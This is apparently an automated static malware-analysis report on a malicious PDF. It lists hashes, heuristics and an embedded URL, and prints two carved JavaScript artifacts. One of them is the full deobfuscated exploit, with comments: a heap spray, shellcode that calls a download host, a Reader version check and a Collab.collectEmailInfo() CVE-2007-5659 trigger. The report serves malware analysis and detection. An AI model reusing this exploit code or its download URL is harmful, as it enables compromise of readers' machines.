Malicious PDF — malware analysis report

Static analysis result for SHA-256 733a4028cc14802d…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
MD5: 3cb01709089909d3e774c7ce4dbf494f SHA-1: 7d6e9a683392ff1bb12d54a6c2c09e7557d5ac67 SHA-256: 733a4028cc14802ddff204d6d751fcc7f319bea17b8978c2ce828c72cfac2fe8
Risk score: 290

Malware Insights

MITRE ATT&CK
T1203 (Exploitation for Client Execution); T1059.007 (Command and Scripting Interpreter: JavaScript)

The PDF file carries embedded JavaScript that, once deobfuscated, is a heap spray followed by a Collab.collectEmailInfo() call with an oversized msg argument — the CVE-2007-5659 trigger in Adobe Reader. The shellcode placed in each spray block embeds the URL http://abb192.cn/spl2/load.php?id=6115&spl=4 as little-endian %uXXXX escapes; it is most likely fetched to download and execute a second-stage payload (the second stage itself was not recovered — only the static stage is shown on this page). The ML classifier independently scores the sample as malicious (1.0000).

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an oversized msg field passed to Collab.collectEmailInfo(), normally paired with a heap spray so the corrupted pointer lands on attacker-controlled memory. In this sample the recovered stage only issues the call when app.viewerVersion reports 8.0.x, 8.1.0–8.1.1, 7.0.x or any major version below 7. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl2/load.php?id=6115&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js
608fe18f81270349609c335157eb37b33a42473ad21e6856eda07406a844d213
pdf-javascript-stream PDF /JS object 13 at offset 0x36A 6486 bytes (decoded stream; larger than the 4.7 KB file on disk, so presumably stored behind a compression filter — confirm against the object's /Filter)
Detection
ClamAV: No threats found (single signature engine run against the raw, still-obfuscated stream; a signature miss does not weaken the heuristic findings above)
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function m6HCwdmaXX0a(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function n275XUq2(W6xxum287xfLD){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(W6xxum287xfLD)"+";"+"}");eval("function gdcB8HqNfu(MdV6WUF0L){var orBxnB="+"0,FVdrUBAKYUsB=MdV6WUF0L.l"+"en"+"gth,DIOuf=10"+"2"+"4,HITSoZyIo8d4v,vndsxxQRqbY,twpZ1erU7f46x='',Tbv9kcv=orBxnB,VsLvJCWs7=orBxnB,zwzpaqJgWNmTG=orBxnB,DC9pp=Ar"+"ra"+"y(63,14,37,57,55,54,26,62,5,41,0,0,0,0,0,0,15,6,29,39,36,3,20,8,13,22,56,31,2,24,45,27,42,28,35,33,30,7,46,43,52,11,16,0,0,0,0,60,0,59,58,32,17,1,10,0,44,50,34,25,21,53,19,48,9,38,23,4,40,18,49,51,47,12,61);f"+"o"+"r(vndsxxQRqbY=M"+"at"+"h.c"+"ei"+"l(FVdrUBAKYUsB/"+"DIOuf)"+";vndsxxQRqbY>orBxnB;vndsxxQRqbY-"+"-){fo"+"r(HITSoZyIo8d4v=Ma"+"th.m"+"in(FVdrUBAKYUsB,DIOuf);HITSoZyIo8d4v>orBxnB;HITSoZyIo8d4v-"+"-,FVdrUBAKYUsB-"+"-){zwzpaqJgWNmTG|"+"=(DC9pp[MdV6WUF0L.cha"+"rCod"+"eAt(Tbv9kcv+"+"+)-48])<"+"<VsLvJCWs7;if(VsLvJCWs7){twpZ1erU7f46x+"+"=n275XUq2"+"(86^zwzpaqJgWNmTG&"+"2"+"5"+"5);zwzpaqJgWNmTG>"+">="+"8;VsLvJCWs7-"+"="+"2;}el"+"se{VsLvJCWs7="+"6"+";}}"+"}return (twpZ1erU7f46x);}var 
oKwYFGk=implode('',['5eiH','DMUs0tn','8Ey','jY','q','X','v','12kjB','WkU1wsjBrZLp4_jK','0m','qBoyL1mGi@3cRB2MqybJwA','7voEJFRAMMIpeon','HTZgAbk4','eKZo1myd1s','Xv','kXJi1K_CBNMrG7_','R1wMCKy_g1mteAql','ug_','F','RU','sc','eTbyE1vGj@','_d','q6U_eeaFws3Z','ZUCdRYa','_vK','N','ooEJFRAMMIpeonHTZgA5m','4','65voEJ','FRAMMIpeonHTZgA','NNjBy_g1mte','Aqlug_FRU','scSB','WkUE@','cnH6cSk2sg@','m','J','eeM','crp','RZnpjZi@JsRKq94','eKZo','1my','d1sXvkXJi1K','DUk0mqB','Dy','RGR','ZL','15voE','JF','RAM','MIp','eon','HT','ZgAN','k4f','5','ewGJFRG0','DE159ns2ZcGuDnkSmS','1','7z','CB','NMUG4Zj','B@GdMS','BdA1sLkat','RBWkCkVMIHqlRkmMIHNk','U','G4ZjBEhwMR','zgA5NqBRcwy2FwHqyRKXH4GjlqM','2H4GjlqM2','H4GjlqM','2H4Gq','evsFy4G2l5M','F','y4','GceI8xH4GVkA8xH4GVk','qk','CH4Gn','gdk2H4GnZqM2H','4G','nZ','esry','4GnJqk','RH4GZg','v','sly4GZ','gesZy','4GVddMZy4Gu','gSMny','4GngvsZy','4Gcp5sZy4GnF','58Zy','4GxeeM','jH4GjdAs','2H4','G','xeeM','jH4GcHv','sSH4Gn','gSk','2H4Gng','vsFy','4G','cp5sZy4GF_','qk2H','4','GcB','qOSH4GnQ58CH4Gq8qk2H4GngvkCH4GngvsZy4GrQeMc','H4GF','_5sFy4GS8qOSH4','GcH5kCH4Gq','85sCH4GngvkZ','y','4GngvsZy4GrQeM','cH4','GF_5','sS','H4GlQSOSH','4GCk5','MZy4Gq8','Akuy4Gng','Sk','uy4GngvsZy4GrQeMcH4GF_5s2H4G','q','k','qO','SH4','GqeekCH4G','q8qO','Z','y','4GngdkFy4Gng','vsZy','4','GrQeM','c','H4GF_AsZy4G','DHSOSH4GqBvOc','H4','Gq8','5','MSH4G','ngekxH4','G','n','gv','sZy','4GrQeMcH4G','rge','sFy','4Gu','sAMZy4GxBek','ly4Gce5k','RH4GZs58ry4GnJqkcH','4Gngvs','ny4GFQ','5sZy4G','xBeMc','H4GcpI8F','y4Gn','Zv','8','ry','4GnySO','RH4Gc','pA8cH4GZsA8ry4Gq8A','8','x','H','4GngeMj','H4','Gngvs','Z','y4GV8A8Zy4GZyqsxH4Gxe','d8qH4G','S3qkSH','4Gn','gvsZy4Gce5sZy4GZ','F58r','y4','GDBeMjH','4G','Dee','Mly4GceA','8Zy','4Glgv8ry4GCkqOSH4GngvsZy4','GF','gv','sZy4GrQeMjH','4G','VH','As','Fy4','GFg','5suy4','GFQeMjH4Gq8As','SH','4G','ng','SOny4GngvsZy4Gr','Qvsly4GD','3I','8Zy4GFF5sZ','y4','G','lQ5','OCH','4GD3qOry4GnZv','8Zy','4GVBvOSH4','GngvsZy4GxBv','kqH4G','cp','I8Zy4G','nF5','8ry4Gny','SORH4
Gc','pA','8cH','4GZsA8r','y','4GrgSk','S','H4','Gngv','sZy4G','VH','5s','Zy4GF','s5','sV','H4Gr','Q','vsly4G','uF','d8Fy4GFFdkjH4GCkA8ly4Gl','gvOry4GFFe8Zy4GrQeMjH4GVH','As2','H4GFg5sry4','GFQeM','jH4Gq8AsSH','4Gngd8ly4G','ngvsZy4GngSORH4Gx','BvkqH','4','Gc','pI8Z','y4Gns5','8r','y','4Gn','GS','O','RH','4GcpA8cH4GZ','sA8ry4G','ZgSk','SH4GngvsZy4GVH5sZy4Gc','p5','kqH4GZgv8','ry4','Gn','y','SORH4GcpA8c','H4','GZsA8ry4Gn','gSkSH4Gng','vsZ','y','4Gr','yvsZy4G','FGe8','jH4Gq','Hvsly4GqHvsly','4GqH','vsly4GqHvsl','y4Gq','lAM','ly','4G','Fy5sFy4GcpA8l','y4','GqpdkR','H4GFGvkVH','4Gqev','kq','H4GcpA8ry4G','cp','qk','2H4G','ns5ODH4GF','ZA','MjH4GF_5','s2H4Gx','l','eMjH4Gcpqs2','H4GZQ','5OFy4G','nF','vOSH4','GF_5kly4G','xzAMjH4GnFd','8Zy','4GuFv','kly4GrgAkcH4G','jd58n','y4','GDlvsly4','GuFe8','xH4','GnM5k','xH4GZ','g','v','MC','H4GCpSsRH','4Gns5OFy','4','GD','BA','k','ny4GnFv','s','DH4G','rgvkuy4','GCH','S','kjH4','GC
... (truncated)
generic_stage_recovery_000.js
460fa20a98a65a1675f1f9e89b8ca548de53484ccfe837bc364572c6c773c4ce
deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36A 2604 bytes
Detection
ClamAV: No threats found (signature engine run against the recovered stage; the heuristic hits above are the actual detection — treat this miss as a coverage gap, not as evidence the stage is benign)
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Recovered second-stage JavaScript (carved from /JS object 13, decoded by the
// sixbit-xor-table stage recovery). Structure: heap spray + version gate +
// Collab.collectEmailInfo() trigger (CVE-2007-5659). Annotations below come from
// static reading only; nothing here was executed.
var FilCUuxpKm3p = new Array(); // holds the heap-spray blocks (NOP sled + shellcode)

// Grow `ZYncLN0sWjcHRN` by doubling until it covers `QIRmcEoRK1bxmI` bytes, then
// cut it to exactly QIRmcEoRK1bxmI/2 UTF-16 units (= QIRmcEoRK1bxmI bytes).
// Used to pad each NOP sled to a fixed byte size.
function s0dlhM(ZYncLN0sWjcHRN, QIRmcEoRK1bxmI) {
  while (ZYncLN0sWjcHRN.length*2<QIRmcEoRK1bxmI){ZYncLN0sWjcHRN += ZYncLN0sWjcHRN;}
  ZYncLN0sWjcHRN = ZYncLN0sWjcHRN.substring(0,QIRmcEoRK1bxmI/2);
  return ZYncLN0sWjcHRN;
}

// Heap spray. Fills memory up to 0x0c0c0c0c with ~4 MB blocks of 0x90 NOP sled
// followed by the shellcode, so that a control value of 0x0c0c0c0c (what the
// overflow below is filled with) lands inside a sled and slides into the shellcode.
function lGsRtDo37Kl() {
  var YD77AOXw2ml = 0x0c0c0c0c; // spray ceiling; same value the trigger string is made of
  // Shellcode as little-endian %uXXXX escapes. Its tail decodes to
  // http://abb192.cn/spl2/load.php?id=6115&spl=4 (the downloader URL reported above).
  // The head (43x6, EB 0F, 5B, 33 C9, 66 B9 80 01, 80 33 EF, 43, E2 FA, EB 05, E8 EC FF FF FF)
  // appears to be a jmp/call/pop self-decoding stub XOR-ing 0x180 bytes with key 0xEF --
  // NOTE(review): confirm in a disassembler before asserting the decoder or the APIs used.
  var Um55YN = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F32%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3136%u3531%u7326%u6C70%u343D");
  var CnLIPZOVjn = 0x400000; // 4 MB per spray block
  var VopRHwDL1mi = Um55YN.length * 2; // shellcode size in bytes (2 bytes per UTF-16 unit)
  var QIRmcEoRK1bxmI = CnLIPZOVjn - (VopRHwDL1mi+0x38); // sled bytes so sled + shellcode (+0x38 slack, presumably for string/heap headers) fills one block
  var ZYncLN0sWjcHRN = unescape("%u9090%u9090"); // NOP sled seed
  ZYncLN0sWjcHRN = s0dlhM(ZYncLN0sWjcHRN, QIRmcEoRK1bxmI);
  var WNfdu06Ujtp2IP = (YD77AOXw2ml - 0x400000)/CnLIPZOVjn; // blocks needed to reach 0x0c0c0c0c (~47.2, so the loop runs 48 times)
  for (var deGdXTS=0;deGdXTS<WNfdu06Ujtp2IP;deGdXTS++) {
    FilCUuxpKm3p[deGdXTS] = ZYncLN0sWjcHRN + Um55YN;
  }
}

// Version gate + trigger. Fires only on Reader builds the author expected to be
// vulnerable: 8.0.x, 8.1.0-8.1.1, 7.0.x, or any major version below 7 (7.1+ is skipped).
function N9Dro2hGIdTee() {
  var y4Fkjsft = app.viewerVersion.toString(); // Acrobat JavaScript API; undefined outside a PDF viewer
  y4Fkjsft = y4Fkjsft.replace(/\D/g,""); // strip dots: "8.1.1" -> "811"
  var UcrzeA = new Array(y4Fkjsft.charAt(0),y4Fkjsft.charAt(1),y4Fkjsft.charAt(2)); // first three digits as [major, minor, patch]; loose (==, <) comparisons on strings
  if ((UcrzeA[0] == 8 && ((UcrzeA[1] == 1 && UcrzeA[2] < 2) || UcrzeA[1] < 1)) || (UcrzeA[0] == 7 && UcrzeA[1] < 1) || (UcrzeA[0] < 7)) {
    lGsRtDo37Kl(); // spray first
    // Trigger string: 0x0c0c words doubled until >= 44952 UTF-16 units (ends at 65536 units = 128 KB).
    var TyXIq = unescape("%u0c0c%u0c0c");
    while(TyXIq.length < 44952) TyXIq += TyXIq;
    // CVE-2007-5659: oversized msg field handed to Collab.collectEmailInfo(); the overwritten
    // control data presumably becomes 0x0c0c0c0c, pointing into the spray above.
    this.collabStore = Collab.collectEmailInfo({subj: "",msg: TyXIq});
  }
}
N9Dro2hGIdTee(); // runs as soon as the /JavaScript action executes this stream (presumably on document open)